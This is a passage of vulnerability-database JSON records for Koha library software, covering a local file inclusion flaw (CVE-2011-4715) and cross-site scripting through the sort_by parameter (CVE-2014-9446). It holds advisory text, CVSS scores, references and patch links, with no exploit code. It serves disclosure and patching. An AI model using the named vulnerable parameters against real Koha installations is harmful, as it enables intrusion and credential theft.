ADVISORY:\nhttp://secunia.com/advisories/46980/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46980/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46980\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nAkin Tosunlar has discovered a vulnerability in Koha, which can be\nexploited by malicious people to disclose sensitive information. \n\nInput passed to the \"KohaOpacLanguage\" cookie value in\ncgi-bin/koha/mainpage.pl is not properly verified in\ncgi-bin/opac/opac-main.pl before being used to include files. \n\nThe vulnerability is confirmed in version 4.02.06. Other versions may\nalso be affected. \n\nSOLUTION:\nFixed in the GIT repository. \n\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nPROVIDED AND/OR DISCOVERED BY:\nAkin Tosunlar, Vigasis Labs\n\nORIGINAL ADVISORY:\nVigasis Labs:\nhttp://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability\u0026lnk=exploits/18153\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4715"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003333"
},
{
"db": "CNVD",
"id": "CNVD-2011-5088"
},
{
"db": "BID",
"id": "50812"
},
{
"db": "IVD",
"id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "107287"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "50812",
"trust": 3.1
},
{
"db": "NVD",
"id": "CVE-2011-4715",
"trust": 2.9
},
{
"db": "SECUNIA",
"id": "46980",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "18153",
"trust": 1.6
},
{
"db": "OSVDB",
"id": "77322",
"trust": 1.6
},
{
"db": "CNVD",
"id": "CNVD-2011-5088",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201112-130",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003333",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201111-450",
"trust": 0.6
},
{
"db": "XF",
"id": "71478",
"trust": 0.6
},
{
"db": "IVD",
"id": "BC1048B6-1F7D-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "107287",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-5088"
},
{
"db": "BID",
"id": "50812"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003333"
},
{
"db": "PACKETSTORM",
"id": "107287"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-450"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-130"
},
{
"db": "NVD",
"id": "CVE-2011-4715"
}
]
},
"id": "VAR-201112-0305",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-5088"
}
],
"trust": 1.3804196000000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-5088"
}
]
},
"last_update_date": "2024-11-23T22:53:33.007000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "[#21464023] Security: arbitrary file inclusion",
"trust": 0.8,
"url": "https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm"
},
{
"title": "Koha 3.6.1",
"trust": 0.8,
"url": "http://koha-community.org/koha-3-6-1/"
},
{
"title": "Koha 3.4.7",
"trust": 0.8,
"url": "http://koha-community.org/koha-3-4-7/"
},
{
"title": "koha-3.06.01",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=42015"
},
{
"title": "koha-3.04.07",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=42014"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-003333"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-130"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-003333"
},
{
"db": "NVD",
"id": "CVE-2011-4715"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.securityfocus.com/bid/50812"
},
{
"trust": 1.7,
"url": "http://www.vigasis.com/en/?guncel_guvenlik=liblime%20koha%20%3c=%204.2%20local%20file%20inclusion%20vulnerability\u0026lnk=exploits/18153"
},
{
"trust": 1.6,
"url": "https://github.com/liblime/liblime-koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#c4/output.pm"
},
{
"trust": 1.6,
"url": "http://www.exploit-db.com/exploits/18153"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/46980"
},
{
"trust": 1.6,
"url": "http://osvdb.org/77322"
},
{
"trust": 1.6,
"url": "http://koha-community.org/koha-3-6-1/#more-2929"
},
{
"trust": 1.6,
"url": "http://koha-community.org/koha-3-4-7/#more-2971"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71478"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4715"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4715"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/71478"
},
{
"trust": 0.3,
"url": "http://koha-community.org/"
},
{
"trust": 0.3,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=6629"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46980"
},
{
"trust": 0.1,
"url": "http://secunia.com/company/jobs/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/46980/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/46980/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5088"
},
{
"db": "BID",
"id": "50812"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003333"
},
{
"db": "PACKETSTORM",
"id": "107287"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-450"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-130"
},
{
"db": "NVD",
"id": "CVE-2011-4715"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-5088"
},
{
"db": "BID",
"id": "50812"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003333"
},
{
"db": "PACKETSTORM",
"id": "107287"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-450"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-130"
},
{
"db": "NVD",
"id": "CVE-2011-4715"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-11-28T00:00:00",
"db": "IVD",
"id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
},
{
"date": "2011-11-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5088"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50812"
},
{
"date": "2011-12-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003333"
},
{
"date": "2011-11-26T01:20:36",
"db": "PACKETSTORM",
"id": "107287"
},
{
"date": "1900-01-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-450"
},
{
"date": "2011-12-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201112-130"
},
{
"date": "2011-12-08T19:55:08.187000",
"db": "NVD",
"id": "CVE-2011-4715"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-11-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5088"
},
{
"date": "2011-12-20T21:59:00",
"db": "BID",
"id": "50812"
},
{
"date": "2011-12-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003333"
},
{
"date": "2011-11-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-450"
},
{
"date": "2011-12-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201112-130"
},
{
"date": "2024-11-21T01:32:50.897000",
"db": "NVD",
"id": "CVE-2011-4715"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-450"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-130"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Koha and LibLime Koha Vulnerable to directory traversal",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-003333"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Path traversal",
"sources": [
{
"db": "IVD",
"id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-130"
}
],
"trust": 0.8
}
}
var-201501-0066
Vulnerability from variot
Multiple cross-site scripting (XSS) vulnerabilities in the Staff client in Koha before 3.16.6 and 3.18.x before 3.18.2 allow remote attackers to inject arbitrary web script or HTML via the sort_by parameter to the (1) opac parameter in opac-search.pl or (2) intranet parameter in catalogue/search.pl. Koha is the first open source library automation system. There are multiple cross-site scripting vulnerabilities in Koha. Because the program fails to properly filter user-supplied input, an attacker could exploit these vulnerabilities to execute arbitrary script code in the context of a browser that is not known to the affected user. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201501-0066",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "koha",
"scope": "eq",
"trust": 1.6,
"vendor": "koha",
"version": "3.18.1"
},
{
"model": "koha",
"scope": "eq",
"trust": 1.6,
"vendor": "koha",
"version": "3.18.0"
},
{
"model": "koha",
"scope": "lte",
"trust": 1.0,
"vendor": "koha",
"version": "3.16.05"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.18.x"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.18.2"
},
{
"model": "library software community koha",
"scope": null,
"trust": 0.6,
"vendor": "koha",
"version": null
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.16.05"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "koha",
"version": "*"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "koha",
"version": "3.18.0"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "koha",
"version": "3.18.1"
}
],
"sources": [
{
"db": "IVD",
"id": "ad18394a-2351-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-09234"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007487"
},
{
"db": "CNNVD",
"id": "CNNVD-201412-537"
},
{
"db": "NVD",
"id": "CVE-2014-9446"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:koha:koha",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-007487"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Chris Cormack",
"sources": [
{
"db": "BID",
"id": "71803"
},
{
"db": "CNNVD",
"id": "CNNVD-201412-537"
}
],
"trust": 0.9
},
"cve": "CVE-2014-9446",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2014-9446",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2014-09234",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "ad18394a-2351-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-9446",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-9446",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-09234",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201412-537",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "ad18394a-2351-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "ad18394a-2351-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-09234"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007487"
},
{
"db": "CNNVD",
"id": "CNNVD-201412-537"
},
{
"db": "NVD",
"id": "CVE-2014-9446"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in the Staff client in Koha before 3.16.6 and 3.18.x before 3.18.2 allow remote attackers to inject arbitrary web script or HTML via the sort_by parameter to the (1) opac parameter in opac-search.pl or (2) intranet parameter in catalogue/search.pl. Koha is the first open source library automation system. There are multiple cross-site scripting vulnerabilities in Koha. Because the program fails to properly filter user-supplied input, an attacker could exploit these vulnerabilities to execute arbitrary script code in the context of a browser that is not known to the affected user. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-9446"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007487"
},
{
"db": "CNVD",
"id": "CNVD-2014-09234"
},
{
"db": "BID",
"id": "71803"
},
{
"db": "IVD",
"id": "ad18394a-2351-11e6-abef-000c29c66e3d"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-9446",
"trust": 3.5
},
{
"db": "BID",
"id": "71803",
"trust": 2.5
},
{
"db": "SECUNIA",
"id": "61187",
"trust": 1.6
},
{
"db": "CNVD",
"id": "CNVD-2014-09234",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201412-537",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007487",
"trust": 0.8
},
{
"db": "IVD",
"id": "AD18394A-2351-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "ad18394a-2351-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-09234"
},
{
"db": "BID",
"id": "71803"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007487"
},
{
"db": "CNNVD",
"id": "CNNVD-201412-537"
},
{
"db": "NVD",
"id": "CVE-2014-9446"
}
]
},
"id": "VAR-201501-0066",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "ad18394a-2351-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-09234"
}
],
"trust": 1.3804196000000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "ad18394a-2351-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-09234"
}
]
},
"last_update_date": "2024-11-23T22:18:27.739000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Bug 13425",
"trust": 0.8,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425"
},
{
"title": "Koha 3.16.6 Release",
"trust": 0.8,
"url": "http://koha-community.org/koha-3-16-6-release/"
},
{
"title": "Koha 3.18.2 Release",
"trust": 0.8,
"url": "http://koha-community.org/koha-3-18-2-release/"
},
{
"title": "Koha has multiple patches for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/53350"
},
{
"title": "koha-3.16.06",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=53165"
},
{
"title": "koha-3.18.02",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=53166"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-09234"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007487"
},
{
"db": "CNNVD",
"id": "CNNVD-201412-537"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-007487"
},
{
"db": "NVD",
"id": "CVE-2014-9446"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://www.securityfocus.com/bid/71803"
},
{
"trust": 1.6,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=13425"
},
{
"trust": 1.6,
"url": "http://koha-community.org/koha-3-16-6-release/"
},
{
"trust": 1.6,
"url": "http://koha-community.org/koha-3-18-2-release/"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/61187"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9446"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-9446"
},
{
"trust": 0.3,
"url": "http://koha-community.org/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-09234"
},
{
"db": "BID",
"id": "71803"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007487"
},
{
"db": "CNNVD",
"id": "CNNVD-201412-537"
},
{
"db": "NVD",
"id": "CVE-2014-9446"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "ad18394a-2351-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-09234"
},
{
"db": "BID",
"id": "71803"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-007487"
},
{
"db": "CNNVD",
"id": "CNNVD-201412-537"
},
{
"db": "NVD",
"id": "CVE-2014-9446"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-12-31T00:00:00",
"db": "IVD",
"id": "ad18394a-2351-11e6-abef-000c29c66e3d"
},
{
"date": "2014-12-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-09234"
},
{
"date": "2014-12-27T00:00:00",
"db": "BID",
"id": "71803"
},
{
"date": "2015-01-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-007487"
},
{
"date": "2014-12-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201412-537"
},
{
"date": "2015-01-02T20:59:04.930000",
"db": "NVD",
"id": "CVE-2014-9446"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-12-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-09234"
},
{
"date": "2015-01-06T00:05:00",
"db": "BID",
"id": "71803"
},
{
"date": "2015-01-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-007487"
},
{
"date": "2015-01-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201412-537"
},
{
"date": "2024-11-21T02:20:54.557000",
"db": "NVD",
"id": "CVE-2014-9446"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201412-537"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Koha of Staff Client cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-007487"
}
],
"trust": 0.8
},
